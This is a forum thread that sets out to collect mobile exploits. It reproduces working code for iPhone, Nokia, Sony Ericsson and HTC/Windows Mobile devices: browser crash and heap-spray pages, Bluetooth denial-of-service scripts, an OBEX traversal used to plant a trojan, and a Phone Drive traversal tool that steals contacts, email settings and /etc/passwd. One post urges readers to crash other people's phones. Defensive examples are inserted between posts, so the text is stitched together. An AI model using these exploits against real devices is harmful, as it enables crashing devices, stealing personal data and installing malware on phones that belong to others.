Thread: Mobile exploits


Encoder
02-21-2010, 11:43 PM
Hello to all dear users. In this topic, with each other's help, we will build a reference of mobile exploits! This topic will be more important and more useful than the dedicated mobile hacking topic! Put every exploit you find or write for mobile in this section!

Thanks for your cooperation ♥

I hope it becomes the biggest mobile exploit reference on the Internet ;)

Encoder
02-21-2010, 11:43 PM
# Apple iPhone (MobileSafari) Crash & Reboot
# TheLeader, GSOG2009 [st0p] hotmail [sp4m] com
# Shoutz: hacking.org.il, nullbyte.org.il

# Tested on iPod Touch 2G, OS 2.2.1
# Launch MobileSafari, enter the page and MobileSafari will freeze.
# Wait for 4-5 minutes and the device will spontaneously reboot.

# Exploit:

<html>
<body>
<script>
var a = '';
for (var i = 1; i <= 500000; i++)
{
a += '\n';
}
alert(a);
</script>
</body>
</html>

Encoder
02-21-2010, 11:44 PM
I'll add the full information on Bugtraq ID 33359.

Title: HTC / Windows Mobile OBEX FTP Service Directory Traversal
Author: Alberto Moreno Tablado
Vendor: HTC
Vulnerable Products:
- HTC devices running Windows Mobile 6
- HTC devices running Windows Mobile 6.1
Non vulnerable products:
- HTC devices running Windows Mobile 5.0
- Other vendors’ Windows Mobile devices
References: [Only registered and activated users can see links]

Summary:
HTC devices running Windows Mobile 6 and Windows Mobile 6.1 are prone to a directory traversal vulnerability in the Bluetooth OBEX FTP Service. Exploiting this issue allows a remote authenticated attacker to list arbitrary directories, and write or read arbitrary files, via a ../ in a pathname. This can be leveraged for code execution by writing to a Startup folder.

Description:
There exists a Directory Traversal vulnerability in the OBEX FTP Service in the Bluetooth Stack implemented in HTC devices running Windows Mobile 6 and Windows Mobile 6.1. The OBEX FTP server is located in \Windows\obexfile.dll. Microsoft states this is a 3rd party driver developed by HTC and installed on HTC devices running Windows Mobile, so the vulnerability affects only this vendor.

A remote attacker (who has previously obtained authentication and authorization rights) can use tools like ObexFTP or gnomevfs-ls from a Linux box to traverse to parent directories outside the default Bluetooth shared folder by using ../ or ..\\ sequences.

The only requirement is that the attacker must have authentication and authorization privileges over Bluetooth. Pairing with the remote device should be enough to get them; however, more sophisticated attacks, such as sniffing the Bluetooth pairing, link key cracking and BD_ADDR spoofing, can be used to avoid this. Devices must have Bluetooth enabled and the File Sharing over Bluetooth service active when the attack is performed. Once the attacker has obtained the proper privileges, further actions will be transparent to the user.

The scope of the Directory Traversal vulnerability allows the attacker to traverse to parent directories outside the default Bluetooth shared folder by using ../ or ..\\ sequences. This flaw makes it possible to browse folders located anywhere in the file system, download files from any folder and upload files to any folder.

A remote attacker who has previously obtained authentication and authorization rights over Bluetooth can perform three risky actions on the device:

1) Browse directories located out of the limits of the default shared folder

An attacker can discover the structure of the file system and access any directory within it, including:
- The flash hard drive
- The external storage card
- The internal mass storage memory, included in specific HTC devices

2) Download files without permission

An attacker can download sensitive files located anywhere in the file system, such as:
- personal pictures and documents located in \My Documents or any other directory
- Contacts, Calendar & Tasks information located in \PIM.vol
- Temporary internet cache and cookies located in \Windows\Profiles\guest\
- emails located in \Windows\Messaging

gospel@gospel-shift:~/bluez$ obexftp -b 00:17:83:02:BA:3C -l "../../Windows/Messaging"
Browsing 00:17:83:02:BA:3C ...
Channel: 4
Connecting...done
Receiving "../../Windows/Messaging"... Sending ".."... Sending ".."... Sending "Windows"... done
<?xml version="1.0"?>
<!DOCTYPE folder-listing SYSTEM "obex-folder-listing.dtd">
<folder-listing version="1.0">
<parent-folder name="Windows" />
<folder name="Attachments" created="20090119T171318Z"/>
<file name="6238002d81030102.mpb" created="20090119T173434Z" size="1521"/>
<file name="6839002d81030102.mpb" created="20090119T171828Z" size="2659"/>
</folder-listing>
done
Disconnecting...done
gospel@gospel-shift:~/bluez$

3) Upload malicious files

An attacker can replace third-party or system executable files with malicious files, as well as upload trojans anywhere in the file system, such as \Windows\Startup, where they will be executed the next time Windows Mobile boots.

gospel@gospel-shift:~/bluez$ obexftp -b 00:17:83:02:BA:3C -c "../../Windows/Startup" -p trojan.exe
Browsing 00:17:83:02:BA:3C ...
Channel: 4
Connecting...done
Sending ".."... Sending ".."... Sending "Windows"... Sending "Startup"... done
Sending "trojan.exe"...\done
Disconnecting...done
gospel@gospel-shift:~/bluez$ obexftp -b 00:17:83:02:BA:3C -l "../../Windows/Startup"
Browsing 00:17:83:02:BA:3C ...
Channel: 4
Connecting...done
Receiving "../../Windows/Startup"... Sending ".."... Sending ".."... Sending "Windows"... done
<?xml version="1.0"?>
<!DOCTYPE folder-listing SYSTEM "obex-folder-listing.dtd">
<folder-listing version="1.0">
<parent-folder name="Windows" />
<file name="trojan.exe" created="20090122T121924Z" size="266168"/>
<file name="poutlook.lnk" created="20061231T230022Z" size="14"/>
</folder-listing>
done
Disconnecting...done
gospel@gospel-shift:~/bluez$

About affected and non affected products:
The following HTC devices are affected by this vulnerability:
- HTC devices running Windows Mobile 6 Professional
- HTC devices running Windows Mobile 6 Standard
- HTC devices running Windows Mobile 6.1 Professional
- HTC devices running Windows Mobile 6.1 Standard

You can find a list of tested HTC devices proven to be vulnerable at [Only registered and activated users can see links]

HTC devices running Windows Mobile 5.0 are not affected because the OBEX FTP service is not implemented in that OS version.

Other vendors’ Windows Mobile devices are not affected either: ASUS, Samsung, LG, ...

Vendor Status:
The vulnerability was first disclosed on 2009/01/19 as an issue in the Microsoft Bluetooth Stack as a whole, on Windows Mobile 6 Professional. Subsequent tests proved that several Windows Mobile 6 Standard and Windows Mobile 6.1 Professional devices were also vulnerable. Microsoft was contacted on 2009/01/22 and this information was not made public because the latest mobile phones being manufactured were vulnerable.

Further investigation proved that the issue is in a 3rd party driver installed by HTC; this vulnerability only affects HTC devices, and other vendors' Windows Mobile devices are not affected.

HTC Europe has been contacted since 2009/02/09 and provided with all the details concerning the exploitation of the flaw. However, no patches are known to have been released for this security flaw.

Workaround:
This vulnerability is a zero-day threat. This means that all devices shipped to date (July 2009) may be vulnerable.

Wait for proper vendor response and updates.

Do not accept pairing nor connection requests from unknown sources. Delete old entries in the paired devices list.

Alberto
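
The traversal above works because the OBEX FTP server joins the client-supplied name onto the shared folder and never checks where the result lands. The following is an added example, not part of the advisory and not HTC's obexfile.dll code, showing a naive join beside a contained one: the contained version normalises the path and then requires it to stay under the shared root. The shared-folder name, the function names and the use of POSIX-style path handling are assumptions for illustration; the real server runs on Windows CE, whose default shared folder name varies by device.

```python
import posixpath

# Assumed default Bluetooth shared folder (illustrative; the real name varies by device).
SHARED_ROOT = "/My Documents/Bluetooth"


def _to_posix(name: str) -> str:
    """Windows CE accepts both separators, and the advisory shows that both
    '../' and '..\\' walk out of the folder, so fold backslashes first."""
    return name.replace("\\", "/")


def resolve_vulnerable(root: str, name: str) -> str:
    """Naive join, as the vulnerable server effectively does:
    '..' segments are honoured and can leave the shared folder."""
    return posixpath.normpath(posixpath.join(root, _to_posix(name)))


def resolve_safe(root: str, name: str) -> str:
    """Join, normalise, then require the result to stay under root.
    Raises PermissionError for any name that would escape."""
    root_n = posixpath.normpath(root)
    rel = _to_posix(name).lstrip("/")   # never let the client supply an absolute path
    full = posixpath.normpath(posixpath.join(root_n, rel))
    # A bare string-prefix test is not enough: '/My Documents/Bluetooth2' starts
    # with '/My Documents/Bluetooth', so require root itself or root + '/'.
    if full != root_n and not full.startswith(root_n + "/"):
        raise PermissionError("path escapes shared folder: %r" % name)
    return full


def escapes(root: str, name: str) -> bool:
    """True when the contained resolver would reject the name."""
    try:
        resolve_safe(root, name)
    except PermissionError:
        return True
    return False


if __name__ == "__main__":
    # The two paths from the advisory's obexftp sessions, plus a benign one.
    for name in ("../../Windows/Messaging", "..\\..\\Windows\\Startup", "Photos/img.jpg"):
        naive = resolve_vulnerable(SHARED_ROOT, name)
        safe = "rejected" if escapes(SHARED_ROOT, name) else resolve_safe(SHARED_ROOT, name)
        print("%-28r naive -> %-30s safe -> %s" % (name, naive, safe))
```

The check is done on the normalised absolute path, not on the presence of the literal string "..", so encodings or separator tricks that normalise to the same escape are rejected as well, and a name whose segments happen to start with ".." (such as "..notes") is still allowed.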

Encoder
02-21-2010, 11:45 PM
#!/usr/bin/perl
#
# ----------WM6 remote overflow reboot PoC----------
# Simple exploit for remotely rebooting a Windows Mobile device.
# Maybe we can use it for command execution;
# I have not tested that, since the device reboots and does not dump a core
# for further analysis.
#
# The bug is not really in the long string name itself but in the first
# time the WM6 device tries to get a connection with a too-long name.
#
# There are two ways to exploit this bug. This PoC shows the first method
# (direct connect to the device if we know the bdaddr), but you can
# just wait for the device to search and overflow by itself when it
# sees the hci name:
# hciconfig <hci dev> name `perl -e 'print "A"x90000'`
# hciconfig <hci dev> piscan
# You just have to wait until the WM device searches for Bluetooth devices
# in range and it will be overflowed.
#
# *Tested on WM6 fully patched on [HTC wiza 200],[HTC Mda 8125]
# (by Julien Bedard)
#

use Net::Bluetooth;

$target=$ARGV[0];
$hci_dev=$ARGV[1];
$overflow="A" x 90000;
$rfcomm_port="3";

if (@ARGV < 2)
{
die "Usage:\n ./wm6_dos.pl <target_mac> <hci_device>\n\n";
}

# change this lame cmd ???
system("hciconfig $hci_dev name $overflow");

$over_conn = Net::Bluetooth->newsocket("RFCOMM");
print "socket error $!\n" unless(defined($over_conn));
$over_conn->connect($target, $rfcomm_port);

# milw0rm.com [2008-09-26]

Encoder
02-21-2010, 11:46 PM
<!--

Nokia Browser Crash by Qode

[Only registered and activated users can see links]

-->

<html><body><script>

function crash()

{

alert('Nokia Browser Crash by Qode');

shellcode = unescape('%ucccc');

fill = unescape('%ucccc');

addr = 0x02020202;

var b = fill;

while (b.length <= 0x400000) b+=b;

}

</script>

Nokia Browser Crash by Qode<br>

<input type='button' onClick='crash()' value='Crash'>

</body></html>

Encoder
02-21-2010, 11:48 PM
Use this exploit to reset other people's phones!

How it works:

First save the file in question (explained below), copy your Bluetooth name from it and paste it into the Nick Name field, then save! Now anyone who searches and finds your name will have their phone reset! :x

/*
Nokia Bluetab Exploit
Found & coded by Qnix

- This exploit will create a file called bluetab.txt with your
bluetooth nickname. Send the file to your Nokia mobile,
open it, copy the nickname and paste it into your bluetooth
nickname; if anyone searches and finds your nickname, their
mobile will restart.
- This exploit works on many other Symbian and Java mobiles.

Qnix - [Only registered and activated users can see links]

*/

#include <stdio.h>
#define tab1 0x09   /* horizontal tab */
#define tab2 0x2E   /* '.' */
#define dot1 0x0A   /* line feed */

void msgm(void);    /* prototype: msgm() is defined after main() */

int main(int argc, char *argv[])
{
    FILE *bluetab;

    if (argc < 2)
    {
        msgm();
        printf("Usage : ./bluetab <nickname>\n");
        return 0;
    }
    else
    {
        msgm();
        printf("bluetab.txt file created with your nickname . \n");
    }

    bluetab = fopen("bluetab.txt", "w");
    if (!bluetab)
    {
        msgm();
        printf("Some kind of file error!\n");
        return 0;
    }

    /* nickname followed by TAB, '.', LF: the sequence that makes the
       searching phone restart */
    fprintf(bluetab, "%s%c%c%c", argv[1], tab1, tab2, dot1);
    fclose(bluetab);
    return 0;
}

void msgm(void)
{
    printf(" ------------------------------- \n");
    printf(" Nokia Bluetab Exploit \n");
    printf(" found & coded by \n");
    printf(" [Only registered and activated users can see links] \n");
    printf(" ------------------------------- \n\n");
}

/* v1 2005-03-04 milw0rm.com */

// milw0rm.com [2005-09-23]

Encoder
02-21-2010, 11:50 PM
/* Sony/Ericsson reset display - PoC */
/* Pierre BETOUIN - [Only registered and activated users can see links] */
/* 05-02-2006 */
/* Vulnerability found using BSS fuzzer : */
/* Download [Only registered and activated users can see links] */
/* */
/* Causes abnormal behaviour on some Sony/Ericsson */
/* cell phones */
/* Vulnerable tested devices : */
/* - K600i */
/* - V600i */
/* - K750i */
/* - W800i */
/* - And maybe other ones... */
/* */
/* Vulnerable devices will slowly turn their screen */
/* black and then display a white screen. */
/* After a short period (~45sec), they will go back to */
/* their normal behaviour */
/* */
/* gcc reset_display_sonyericsson.c -lbluetooth */
/* -o reset_display_sonyericsson */
/* ./reset_display_sonyericsson 00:12:EE:XX:XX:XX */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <bluetooth/bluetooth.h>
#include <bluetooth/hci.h>
#include <bluetooth/l2cap.h>

#define SIZE 4
#define FAKE_SIZE 1 /* claimed payload length: the 4-byte buffer is only the */
                    /* l2cap_cmd_hdr (code, ident, len), so len=1 announces  */
                    /* one byte of payload that is not actually sent          */

int main(int argc, char **argv)
{
char *buffer;
l2cap_cmd_hdr *cmd;
struct sockaddr_l2 addr;
int sock, sent, i;

if(argc < 2)
{
fprintf(stderr, "%s <btaddr>\n", argv[0]);
exit(EXIT_FAILURE);
}

if ((sock = socket(PF_BLUETOOTH, SOCK_RAW, BTPROTO_L2CAP)) < 0)
{
perror("socket");
exit(EXIT_FAILURE);
}

memset(&addr, 0, sizeof(addr));
addr.l2_family = AF_BLUETOOTH;

if (bind(sock, (struct sockaddr *) &addr, sizeof(addr)) < 0)
{
perror("bind");
exit(EXIT_FAILURE);
}

str2ba(argv[1], &addr.l2_bdaddr);

if (connect(sock, (struct sockaddr *) &addr, sizeof(addr)) < 0)
{
perror("connect");
exit(EXIT_FAILURE);
}

if(!(buffer = (char *) malloc ((int) SIZE + 1)))
{
perror("malloc");
exit(EXIT_FAILURE);
}

memset(buffer, 90, SIZE);

cmd = (l2cap_cmd_hdr *) buffer;
cmd->code = L2CAP_ECHO_REQ;
cmd->ident = 1;
cmd->len = htobs(FAKE_SIZE);   /* len is little-endian on the wire */

if( (sent=send(sock, buffer, SIZE, 0)) >= 0)
{
printf("L2CAP packet sent (%d)\n", sent);
}

printf("Buffer:\t");
for(i=0; i<sent; i++)
printf("%.2X ", (unsigned char) buffer[i]);
printf("\n");

free(buffer);
close(sock);
return EXIT_SUCCESS;
}
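
The PoC above sends a 4-byte echo request whose len field announces one byte of payload that is not there. As an added example (mine, not Pierre Betouin's code and not part of the BSS fuzzer), here is a small builder and a strict parser for the L2CAP signalling command format (code, ident, little-endian 16-bit len, then data), showing what the affected phones' stacks should have done: refuse any command whose len does not match the bytes actually received, and answer echo requests only after the whole buffer has been validated. The only values taken from the PoC are the ECHO_REQ code 0x08 and the header layout; the function names and the ECHO_RSP handling are assumptions for illustration.

```python
import struct
from typing import List, Optional, Tuple

L2CAP_ECHO_REQ = 0x08   # the code the PoC sends (BlueZ's L2CAP_ECHO_REQ)
L2CAP_ECHO_RSP = 0x09
CMD_HDR = struct.Struct("<BBH")   # code, ident, len (little-endian): 4 bytes


def build_cmd(code: int, ident: int, payload: bytes,
              claimed_len: Optional[int] = None) -> bytes:
    """Build one signalling command. claimed_len lets the len field lie
    about the payload, which is exactly what the PoC does (len=1, no data)."""
    length = len(payload) if claimed_len is None else claimed_len
    return CMD_HDR.pack(code, ident, length) + payload


def parse_signaling(buf: bytes) -> List[Tuple[int, int, bytes]]:
    """Strict parser: returns [(code, ident, data), ...] and raises
    ValueError if a header is truncated or a command claims more bytes
    than actually remain in the buffer."""
    cmds = []
    off = 0
    while off < len(buf):
        if len(buf) - off < CMD_HDR.size:
            raise ValueError("truncated command header at offset %d" % off)
        code, ident, length = CMD_HDR.unpack_from(buf, off)
        off += CMD_HDR.size
        if length > len(buf) - off:
            raise ValueError("command 0x%02x ident %d claims %d bytes, only %d remain"
                             % (code, ident, length, len(buf) - off))
        cmds.append((code, ident, buf[off:off + length]))
        off += length
    return cmds


def is_well_formed(buf: bytes) -> bool:
    try:
        parse_signaling(buf)
    except ValueError:
        return False
    return True


def echo_response(req: bytes) -> bytes:
    """What a careful stack does: validate the whole buffer first, then
    echo each request's data back under the same ident. Malformed input
    gets no response at all instead of being read past its end."""
    if not is_well_formed(req):
        return b""
    out = b""
    for code, ident, data in parse_signaling(req):
        if code == L2CAP_ECHO_REQ:
            out += build_cmd(L2CAP_ECHO_RSP, ident, data)
    return out


if __name__ == "__main__":
    poc = build_cmd(L2CAP_ECHO_REQ, 1, b"", claimed_len=1)   # 08 01 01 00, as the PoC prints
    print("PoC bytes:", poc.hex(), "well-formed:", is_well_formed(poc))
    good = build_cmd(L2CAP_ECHO_REQ, 2, b"ZZ")
    print("valid echo:", good.hex(), "->", echo_response(good).hex())
```

The length check is done against what the lower layer actually delivered, not against the command's own header; a stack that trusts cmd->len and copies that many bytes into its echo response reads past the received frame, which is the kind of bug the fuzzer-found PoC triggers.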

Encoder
02-21-2010, 11:51 PM
# Apple Safari Iphone Crash using tel:
# Found by cloud : cloud[at]madpowah[dot]org
# [Only registered and activated users can see links]

# Tested on Iphone 3G, OS 3.0.1
# Launch Safari, enter the page and after a few seconds Safari will crash and black screen will appear

# Exploit:

<?php
set_time_limit(0);
$var = "";
for ($i=0; $i<100000; $i++){
$var = $var . "A";
}
echo '<iframe src="tel:' . $var .'"></iframe>';
?>

Encoder
02-21-2010, 11:53 PM
<html><body><script>

function Demo() {

var shellcode;
var addr;
var fill;

alert('attempting a crash!');
shellcode = unescape('%u0c0c');
fill = unescape('%ucccc');
addr = 0x02020202;

var b = fill;
while (b.length <= 0x40000) b+=b;

var c = new Array();
for (var i =0; i<36; i++) {
c[i] =
b.substring(0, 0x100000 - shellcode.length) + shellcode +
b.substring(0, 0x100000 - shellcode.length) + shellcode +
b.substring(0, 0x100000 - shellcode.length) + shellcode +
b.substring(0, 0x100000 - shellcode.length) + shellcode;
}

}

</script>

<input type='button' onClick='Demo()' value='Go!'>

</body></html>

Encoder
02-21-2010, 11:53 PM
<!--
The iPhone / iTouch tif exploit is now officially released!
source: [Only registered and activated users can see links]

So it's official: we have released the tiff exploit code.
You can navigate in safari to [Only registered and activated users can see links]
on your Itouch or Iphone 1.1.1. It will crash your Safari
but then you will be able to browse the file system with
full read/write access. This is only for people who understand
what they are doing. You will need IPHUC and some knowledge of
how to put/get files.

TUTORIAL FOR WINDOWS [Only registered and activated users can see links]

Check back later for a full breakdown of how the
tiff works and what the future holds for Toc2rta and the
Itouch & Iphone.

Exploit by Niacin and Dre.

A special thanks to Pumpkin,dinopio,davidc,natetrue,Smileydude,neimod
,Nervegas,erica,roxfan,phire and the rest of the dev team for all
their work that helped make this happen. You can visit the dev team's
site here : [Only registered and activated users can see links]
-->

<html>
<img src="[Only registered and activated users can see links]">
</html>

# milw0rm.com [2007-10-11]

Encoder
03-03-2010, 02:30 AM
#!/usr/bin/python
# ,
# dM
# MMr
# 4MMML .
# MMMMM. xf
# . "M6MMM .MM-
# Mh.. +MM5MMM .MMMM
# .MMM. .MMMMML. MMMMMh
# )MMMh. MM5MMM MMMMMMM
# 3MMMMx. 'MMM3MMf xnMMMMMM"
# '*MMMMM MMMMMM. nMMMMMMP"
# *MMMMMx "MMM5M\ .MMMMMMM=
# *MMMMMh "MMMMM" JMMMMMMP
# MMMMMM GMMMM. dMMMMMM .
# MMMMMM "MMMM .MMMMM( .nnMP"
# .. *MMMMx MMM" dMMMM" .nnMMMMM*
# "MMn... 'MMMMr 'MM MMM" .nMMMMMMM*"
# "4MMMMnn.. *MMM MM MMP" .dMMMMMMM""
# ^MMMMMMMMx. *ML "M .M* .MMMMMM**"
# *PMMMMMMhn. *x > M .MMMM**""
# ""**MMMMhx/.h/ .=*"
# .3P"%....
# [t12] nP" "*MMnx

# SMOKE WEED
#greetz to my blackhatz and baycatz
#iPhone CSS::Selector crash
#this Python script acts as a web server and sends a malformed long string to the CSS <style> tag
#this is a remote crash bug, however an analysis of the debug dump shows remote code execution capability, I am just lazy

import socket


def main():
    junk = "*>" * 120000   # the malformed selector string

    html = """
<html>
<head>
<style type="text/css">
"""
    html += junk
    html += """
body {background: blue;}
</style>
</head>
</html>
"""

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind(('', 2121))
    s.listen(1)

    while True:
        channel, details = s.accept()
        print(channel.recv(1024))        # the browser's request line
        channel.sendall(html.encode())   # raw body, no HTTP headers, as in the original
        channel.close()


main()

Encoder
03-03-2010, 02:32 AM
###############
# Title -> iPhone / iTouch FTPDisc 1.0 3ExploitsInOne BuffOverflow DoS
# Model -> Tested on iPod Touch 3G 3.1.3
# Software -> FTPDisc 1.0 and FTPDisc 1.0 Lite [Only registered and activated users can see links]
# Attacker -> Tested from GNU/Linux (Sidux), fuzzing with a future PenTBox version :P
#
# Exploit language -> Ruby
# Type -> Remote Denial of Service Exploit caused by Buffer Overflow
#
#
###############
# Discovered and written by Alberto Ortega
# [Only registered and activated users can see links]
###############

require "socket"
require "net/ftp"

expl = ARGV[0]
host = ARGV[1]

puts ""
if !expl || !host
puts "HELP - iPhone / iTouch FTPDisc 1.0 3ExploitsInOne BuffOverflow DoS"
puts ""
puts "Exploits: 1 - USER [MALFORMED] 2 - cd [MALF] 3 - delete [MALF]"
puts ""
puts "- Usage: ftpdisc3io.rb [numberofexploit] [host]"
puts "- Example: ftpdisc3io.rb 1 192.168.1.2"
puts ""
else
buffer = "A"
10.times do
buffer = "#{buffer}#{buffer}" # Here the big buffer to send (doubles ten times: 1024 bytes)
end
if expl == "1" # EXPLOIT 1
begin
socket = TCPSocket.new(host, 21)
puts " Exploiting ..."
socket.write("USER #{buffer}\r\n")
puts " Successfully exploited! :)"
rescue
puts "Connection problem"
end
elsif expl == "2" || expl == "3"
begin
print " Connecting to FTP ... "
ftp = Net::FTP.new(host, "anonymous")
puts "OK"
puts " Exploiting ..."
if expl == "2"
begin
ftp.chdir(buffer) # EXPLOIT 2
rescue
end
else
begin
ftp.delete(buffer) # EXPLOIT 3
rescue
end
end
puts " Successfully exploited! :)"
rescue
puts "Connection problem"
end
else
puts "Incorrect exploit selection (1, 2, 3)"
end
end
puts ""

SPQ
09-23-2011, 12:27 PM
iPhone/iPad Phone Drive 1.1.1 Directory Traversal

EDB-ID: 17645   CVE: N/A   OSVDB-ID: N/A
Author: IRCRASH   Published: 2011-08-09
#!/usr/bin/env python3

#----------------------------------------------------------------
#Software : iPhone/iPad Phone Drive 1.1.1
#Type of vulnerability : Directory Traversal
#Tested On : iPhone 4 (IOS 4.3.3/Jailbroken)
#----------------------------------------------------------------
#Program Developer : [Only registered and activated users can see links]
#----------------------------------------------------------------
#Discovered by : Khashayar Fereidani
#Team Website : [Only registered and activated users can see links]
#English Forums : [Only registered and activated users can see links]
#Team Members : Khashayar Fereidani , Arash Allebrahim
#Email : irancrash [ a t ] gmail [ d o t ] com
#Facebook : [Only registered and activated users can see links]
#Twitter : [Only registered and activated users can see links]
#----------------------------------------------------------------

import urllib.request


def urlread(url, file):
    # eight URL-encoded "../" segments walk from the app's served folder up to /
    url = url + "/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f" + file
    u = urllib.request.urlopen(url)
    with open('result.html', 'wb') as local_file:
        local_file.write(u.read())
    print("file saved as result.html\nIRCRASH.COM 2011")


print("----------------------------------------\n"
      "- iPhone/iPad Phone Drive 1.1.1 DT -\n"
      "- Discovered by : Khashayar Fereidani -\n"
      "- [Only registered and activated users can see links] -\n"
      "----------------------------------------")

url = input("Enter Address ( Ex. : [Only registered and activated users can see links] ):")

# index 0 is unused so the menu numbers below map straight onto the list
f = ["",
     "/private/var/mobile/Library/AddressBook/AddressBook.sqlitedb",
     "/private/var/mobile/Library/Safari",
     "/private/var/mobile/Library/Preferences/com.apple.accountsettings.plist",
     "/private/var/mobile/Library/Preferences/com.apple.conference.plist",
     "/etc/passwd"]

id = int(input("1 : Phone Book\n2 : Safari Fav\n3 : Users Email Info\n"
               "4 : Network Informations\n5 : Passwd File\n6 : Manual File Selection\n Enter ID:"))

# scheme prefix (the forum's link filter replaced this literal; 'http://' is assumed)
if not ('http://' in url):
    url = 'http://' + url

if (id > 0) and (id < 6):
    file = f[id]
    urlread(url, file)

if id == 6:
    file = input("Enter Local File Address : ")
    urlread(url, file)

© Offensive Security 2011
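
The Phone Drive script above hides the traversal behind percent-encoded slashes (`..%2f`), which a filter that only looks for the literal string `../` never sees. As an added example, not from IRCRASH's script and not part of the Phone Drive app, this is detection logic a practitioner could run over the app's (or any web server's) access log: it percent-decodes the request path repeatedly until it stops changing, folds backslashes, and flags any path that contains a `..` segment. The log lines are constructed for the example in common log format, and the three-round decoding limit is an assumption.

```python
import re
from typing import Iterable, List, Tuple
from urllib.parse import unquote

# Common-log-format request line; enough to pull out client, path and status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)


def fully_decode(path: str, max_rounds: int = 3) -> str:
    """Percent-decode until the string stops changing, so ..%252f
    (double-encoded) is caught as well as ..%2f. Bounded so a hostile
    path cannot keep us decoding forever (3 rounds is an assumed limit)."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def is_traversal(raw_path: str) -> bool:
    """True when the decoded request path contains a '..' segment.
    Backslashes are folded to '/' since some servers accept both."""
    path = fully_decode(raw_path.split("?", 1)[0]).replace("\\", "/")
    return any(seg == ".." for seg in path.split("/"))


def scan_log(lines: Iterable[str]) -> List[Tuple[str, str, str]]:
    """Return (client, raw path, status) for every request that looks
    like a traversal attempt; a 200 status means it probably succeeded."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_traversal(m.group("path")):
            hits.append((m.group("ip"), m.group("path"), m.group("status")))
    return hits


# Constructed sample log: two normal requests, the script's ..%2f pattern,
# a double-encoded variant, a %2e%2e variant, a filename that merely starts
# with '..' (must not be flagged), and a backslash variant.
SAMPLE_LOG = [
    '10.0.0.5 - - [09/Aug/2011:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512',
    '10.0.0.5 - - [09/Aug/2011:10:01:03 +0000] "GET /files/photo.jpg HTTP/1.1" 200 20481',
    '10.0.0.9 - - [09/Aug/2011:10:02:10 +0000] "GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd HTTP/1.1" 200 1254',
    '10.0.0.9 - - [09/Aug/2011:10:02:11 +0000] "GET /..%252f..%252fprivate/var/mobile/Library/AddressBook/AddressBook.sqlitedb HTTP/1.1" 200 86016',
    '10.0.0.9 - - [09/Aug/2011:10:02:12 +0000] "GET /%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 200 1254',
    '10.0.0.7 - - [09/Aug/2011:10:03:00 +0000] "GET /files/..readme.txt HTTP/1.1" 404 0',
    '10.0.0.7 - - [09/Aug/2011:10:03:01 +0000] "GET /files/a%5c..%5c..%5cetc%5cpasswd HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for ip, path, status in scan_log(SAMPLE_LOG):
        print("%-10s %s %s" % (ip, status, path))
```

The match is on a whole `..` path segment after decoding rather than on a substring, so ordinary filenames beginning with two dots are not reported, while every encoding of an actual parent-directory step is.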

Silic
11-01-2011, 01:51 PM
Could you please put that file that was described right here for download.
Thanks a lot.

javad13
02-04-2012, 09:14 AM
Hello
I'm really, really sorry that I'm spamming in this section given that this topic is a reference.....
but......
how do you use them???????

Again, I apologise to Mr. encoder and all the friends, and I'm asking for help
Thanks....